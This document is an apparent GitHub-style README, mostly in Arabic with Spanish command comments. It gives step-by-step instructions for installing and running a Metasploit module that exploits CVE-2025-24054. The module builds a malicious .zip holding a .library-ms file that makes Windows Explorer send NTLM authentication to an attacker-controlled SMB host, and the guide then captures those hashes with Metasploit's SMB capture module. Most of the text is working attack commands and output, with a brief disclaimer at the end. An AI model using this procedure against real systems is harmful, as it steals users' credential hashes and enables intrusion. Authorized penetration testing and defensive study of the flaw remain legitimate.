
وحدة Metasploit لاستغلال CVE-2025-24054 (سابقًا 24071). إكسبلويت تسريب NTLM مدمج في Metasploit لهجمات قائمة على مكتبات Windows.
تحدث الثغرة أثناء عملية استخراج ملف .zip. عند التفاعل مع ملف .library-ms مصمم خصيصًا، يقوم مستكشف Windows (Explorer) بمعالجة مخطط XML الداخلي ويبدأ تلقائيًا طلب مصادقة SMB نحو مسار بعيد يتحكم فيه المهاجم.
يتيح هذا السلوك تسريب تجزئة NTLM الخاصة بالمستخدم دون الحاجة إلى أي تفاعل إضافي يتجاوز فك ضغط الملف. لمشاهدة إثبات المفهوم، أنصحك بزيارة الرابط التالي: Fluffy - HTB.
على الرغم من أن هذه الثغرة نُشرت في الأصل باسم CVE-2025-24071، إلا أنها تُتتبع حاليًا رسميًا باسم CVE-2025-24054.
استنساخ المستودع:
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071
نسخ الوحدة إلى دليل Metasploit:
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
إذا لم يكن الدليل موجودًا، فأنشئه باستخدام:
❯ mkdir -p ~/.msf4/modules/auxiliary/server/
ثم أعد نسخ الوحدة.
شغّل Metasploit وحمّل الوحدة:
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak
إذا تم تحميل الوحدة بنجاح، سترى الخيارات المتاحة لتكوينها:
❯ show options
Module options (auxiliary/server/ntlm_hash_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACKER_IP yes IP del atacante (donde corre Responder/Impacket)
FILENAME exploit.zip yes El nombre del archivo ZIP
LIBRARY_NAME documents.library-ms yes Nombre del archivo .library-ms
SHARE_NAME recurso yes Nombre del recurso compartido ficticio
قم بتكوين الوحدة ثم نفّذها:
❯ set ATTACKER_IP 0.0.0.0 # Reemplaza con tu IP atacante
❯ set FILENAME exploit.zip # Nombre del payload que subiras al SMB (equipo objetivo)
❯ set LIBRARY_NAME malicious.library-ms # Nombre de .library-ms file
❯ set SHARE_NAME it_shared # Nombre del recurso SMB
❯ run
Output: el módulo genera un archivo .zip que debe ser subido al servidor SMB objetivo para su posterior ejecución por parte de la víctima
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed
أخيرًا، استخدم وحدة التقاط SMB في Metasploit لاستقبال تجزئات NTLM:
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0 # Reemplaza con tu IP atacante
❯ run
إذا واجهت مشاكل في تشغيل خادم SMB من Metasploit:
طُوّرت هذه الوحدة لأغراض تعليمية وللاختبارات المصرح بها فقط. الاستخدام غير المصرح به لهذا النوع من الأدوات قد يكون غير قانوني.
Security Layer